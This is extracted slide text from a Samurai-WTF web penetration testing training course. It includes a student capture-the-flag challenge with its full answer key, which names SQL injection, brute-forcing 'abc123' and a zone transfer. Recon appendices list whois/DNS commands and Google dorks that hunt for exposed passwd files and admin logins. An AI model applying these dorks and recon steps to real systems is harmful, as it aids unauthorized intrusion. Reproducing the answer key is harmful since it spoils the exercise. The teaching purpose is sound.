Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 196
pyCIT
Python Commandline Interface Templates
http://code.google.com/p/pycit a collection of python templates for creating command line tools great tool for beginners to show how to do the basics saves advanced users time by providing the basic and much more Built in command line arguments, easily modifiable Provides a help page if no arguments are given Tracks and displays your script version Verbosity and debug functions with command line flags Command line options and functions for reading and writing to files
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
197
pyCIT Templates
Completed Templates
Basic file read/write access Single-threaded http requests (basic wget/curl functions)
Templates in Progress
Multi-threaded http requests (basic wget/curl functions)
Planned Templates
Binary file read/write access with hex decode (basic xxd/ hexdump functions) Raw socket client and service (basic netcat functions) Raw usb device access Interactive CLI interface
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
198
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Student Challenge
You can find the challenge at http://dojo Collect as many keys as you can
Up to 20 keys could be found
(err but it appears some are broken L)
Keys look like: 1dcca23355272056f04fe8bf20edfce0 A key ID will be with or near the actual key
such as KEY00=1dcca23355272056f04fe8bf20edfce0
Keys can be found in all steps of the methodology, so dont focus only on exploitation
Bonus points:
How were the keys generated? Can you you calculate what the 21st key would be?
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 200
STOP!!!
The next page contains the Student Challenge answers.
Youve been warned.
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Key 01 = a1d0c6e83f027327d8461063f4ac58a6
in TRACE file in web root
Key 02 = 68d30a9594728bc39aa24be94b319d21
in header parameter Server on all responses
Key 03 = 069059b7ef840f0c74a814ec9237b6ec
used as your session variable 10% of the time
Key 04 = 006f52e9102a8d3be2fe5614f42ba989
html comment on index.php
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
203
Key 06 = 03c6b06952c750899bb03d998e631860
GET parameter in /admin/index.php form submit
Key 07 = 6883966fd8f918a4aa29be29d2c386fb
default text for comment field on contactus.php
Key 08 = 6855456e2fe46a9d49d3d3af4f57443d
hidden field on support.php
Key 09 = 8bf1211fd4b7b94528899de0a43b9fb3
currently not placed
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
204
Key 11 = 51d92be1c60d1db1d2e5e7a07da55b26
in a file called "key11" in the unlinked directory crack
Key 12 = b337e84de8752b27eda3a12363109e80
DNS entry in a zone transfer
Key 13 = ed265bc903a5a097f61d3ec064d96d2e
hidden in database, use a sql injection exploit to find
Key 14 = daca41214b39c5dc66674d09081940f0
Response to logging into partner user account "key"
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
205
Key 16 = 2dea61eed4bceec564a00115c4d21334
Allowed domain in crossdomain.xml
Key 17 = d14220ee66aeec73c49038385428ec4c
new HTTP header response value in all responses
Key 18 = 2823f4797102ce1a1aec05359cc16dd9
default directory in web root
Key 19 = 9e3cfc48eccf81a0d57663e129aef3cb
brute force password abc123 on /admin/index.php
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
206
Next Steps
We will all continue to learn A few things will help us down that path
Continue exploring the tools Build a test lab Teach others Join projects
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
207
Contact Information
Upcoming Samurai-WTF courses:
Athens, Greece July 10-11, 2012 (OWASP AppSec EU) Las Vegas, NV, US July 21-22 & 23-24, 2012 (Black Hat) Ghent, Belgium Sept. 24-25, 2012 (Brucon) Austin, TX, US Oct. 23-24, 2012 (OWASP AppSec NA) Abu Dhabi, UAE Dec. 10-11, 2012 (Black Hat)
Justin Searle
Managing Partner UtiliSec justin@utilisec.com 801-784-2052 @meeas
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 209
APPENDICES
Extra material if time allows
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Recon
The most under utilized steps
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Recon Outline
Domain and IP Registrations Google Hacking Social Networks DNS Interrogation and ZT Fierce Domain Scanner
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
212
Examples to Try:
whois whois whois whois secureideas.net 66.135.50.185 kevin johnson (should fail, why?) h whois.arin.net kevin johnson
213
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
WHOIS Findings
Contact Information
Employees / Users: Denise Johnson, Frank DiMaggio Address: 661 Blanding Blvd., S.103 #351, Orange Park, Florida 32073 Phone: 904-403-8024 Emails: denise@secureideas.net, frank@secureideas.net
Name Servers:
NS1.SECUREIDEAS.NET (66.135.50.185) NS2.SECUREIDEAS.NET (66.135.47.101)
Examples:
intitle:Index+of..etc+passwd intitle:admin+intitle:login intitle:index.of.private intitle:ColdFusion+Administrator+Login filetype:asmx OR filetype:jws inurl:asmx?wsdl OR inurl:jws?wsdl
215
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Social Networks
Precursor to Social Networks
Usenet (Google Groups Deja News acquisition) Mailing lists Web Forums
gpscan
Author: Robin Wood Site: http://www.digininja.org/projects/gpscan.php Purpose: Uses Google to search for Google Profiles (gp) of individuals working at specific companies Language: Ruby Changes in the service interface (or API), e.g. Syntax:
gpscan.rb <company_name>
Examples to try:
./gpscan.rb ./gpscan.rb ./gpscan.rb ./gpscan.rb redhat owasp google hewlett packard
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
217
DNS Interrogation
Common tools:
host (default on Linux and Macs) dig (default on Linux and Macs) nslookup (default on everything)
Forward lookups:
host www.samurai-wtf.org dig www.samurai-wtf.org nslookup www.samurai-wtf.org
Reverse lookups:
host 66.135.50.185 dig -x 66.135.50.185 nslookup 66.135.50.185
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 218
Examples to try:
./fierce.pl dns secureideas.net
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
220